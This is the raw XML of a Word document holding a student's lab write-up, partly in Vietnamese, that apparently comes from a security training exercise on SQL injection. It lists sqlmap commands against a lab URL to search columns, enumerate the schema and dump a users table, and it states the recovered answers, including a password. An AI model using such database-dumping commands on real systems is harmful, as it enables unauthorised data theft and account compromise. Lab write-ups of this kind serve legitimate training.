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0A634" w14:textId="15B26FF6" w:rsidR="00935604" w:rsidRDefault="00645278" w:rsidP="00645278">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645278">
        <w:t xml:space="preserve">What's the name of the column containing "style" in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00645278">
        <w:t>it's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00645278">
        <w:t xml:space="preserve"> name? (Case #1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492233F1" w14:textId="3485C2F0" w:rsidR="00196B3B" w:rsidRDefault="00196B3B" w:rsidP="00196B3B">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5822C610" w14:textId="065A169D" w:rsidR="00196B3B" w:rsidRDefault="00196B3B" w:rsidP="00196B3B">
      <w:r w:rsidRPr="00196B3B">
        <w:t>sqlmap -u "http://94.237.54.42:41964/case1.php?id=1" --search -C style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ECF5C9" w14:textId="0E98682D" w:rsidR="00196B3B" w:rsidRDefault="00196B3B" w:rsidP="00196B3B">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A589C" w14:textId="09364E5D" w:rsidR="00CE4120" w:rsidRDefault="00CE4120" w:rsidP="00196B3B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0368F538" wp14:editId="01876DB1">
            <wp:extent cx="5943600" cy="1572260"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="47231459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14591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8AA9A" w14:textId="087AC86D" w:rsidR="00CE4120" w:rsidRDefault="00CE4120" w:rsidP="00196B3B">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4120">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4120">
        <w:t>PARAMETER_STYLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CBE00D" w14:textId="7AE8A692" w:rsidR="00645278" w:rsidRPr="00645278" w:rsidRDefault="00645278" w:rsidP="0064527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45278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> What's the Kimberly user's password? (Case #1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30309A53" w14:textId="0F6A9765" w:rsidR="00B52DBF" w:rsidRDefault="00B52DBF" w:rsidP="00CB0066">
      <w:r>
        <w:t>Xác định muốn trích xuất bảng nào trong CSDL nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02765B" w14:textId="379026E3" w:rsidR="00645278" w:rsidRDefault="00CB0066" w:rsidP="00CB0066">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15224FED" w14:textId="046994AB" w:rsidR="00CB0066" w:rsidRDefault="00CB0066" w:rsidP="00CB0066">
      <w:r w:rsidRPr="00CB0066">
        <w:t>sqlmap -u "http://94.237.54.42:41964/case1.php?id=1" --schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06B4B0" w14:textId="061E826B" w:rsidR="00CB0066" w:rsidRDefault="00CB0066" w:rsidP="00CB0066">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
      <w:r w:rsidR="006D5A64" w:rsidRPr="006D5A64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D5A64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9A71A2" wp14:editId="1127D1E6">
            <wp:extent cx="5943600" cy="3205480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111280608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806085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E4C9D" w14:textId="467C5B73" w:rsidR="006D5A64" w:rsidRDefault="006D5A64" w:rsidP="00CB0066">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BCD28BD" wp14:editId="7063DA9C">
            <wp:extent cx="5943600" cy="1577975"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="12774772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477288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C870" w14:textId="7511CBC5" w:rsidR="00C43A30" w:rsidRDefault="006D5A64" w:rsidP="00CB0066">
      <w:r>
        <w:t xml:space="preserve">Ta </w:t>
      </w:r>
      <w:r w:rsidR="00B52DBF">
        <w:t xml:space="preserve">lấy ra bảng users trong database test db để lấy được password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6047D6" w14:textId="009FAACE" w:rsidR="006D5A64" w:rsidRDefault="006D5A64" w:rsidP="00CB0066">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE86C8D" w14:textId="045329FA" w:rsidR="006D5A64" w:rsidRDefault="006D5A64" w:rsidP="00CB0066">
      <w:r w:rsidRPr="006D5A64">
        <w:t>sqlmap -u "http://94.237.54.42:41964/case1.php?id=1" --dump -D testdb -T users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AE1BCA" w14:textId="78AAEE5B" w:rsidR="006D5A64" w:rsidRDefault="006D5A64" w:rsidP="00CB0066">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BBCB8" w14:textId="48C387E7" w:rsidR="00C43A30" w:rsidRDefault="00C43A30">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10419771" w14:textId="5DC73B08" w:rsidR="00C43A30" w:rsidRDefault="00C43A30" w:rsidP="00CB0066">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F308B7B" wp14:editId="57036F07">
            <wp:extent cx="5943600" cy="2214880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54836358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363580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1A2EB" w14:textId="392BB5BD" w:rsidR="00B52DBF" w:rsidRDefault="00B52DBF" w:rsidP="00CB0066">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CE7F19E" wp14:editId="61B603D8">
            <wp:extent cx="5943600" cy="1731645"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="13853560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35603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DBEEC" w14:textId="7EF3D1E9" w:rsidR="00B52DBF" w:rsidRDefault="00B52DBF" w:rsidP="00CB0066">
      <w:r>
        <w:t>P/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>s:E</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52DBF">
        <w:t>nizoom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B52DBF">
        <w:t>1609</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B52D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5734DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4743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7186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604"/>
    <w:rsid w:val="00196B3B"/>
    <w:rsid w:val="002E4C6E"/>
    <w:rsid w:val="00645278"/>
    <w:rsid w:val="006D5A64"/>
    <w:rsid w:val="00935604"/>
    <w:rsid w:val="00B52DBF"/>
    <w:rsid w:val="00C43A30"/>
    <w:rsid w:val="00CB0066"/>
    <w:rsid w:val="00CE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C7FDE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{321F987A-D8A5-4EAE-A26B-3A86A89A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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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604"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="badge">
    <w:name w:val="badge"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006452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73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Quoc Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-27T05:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-27T06:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>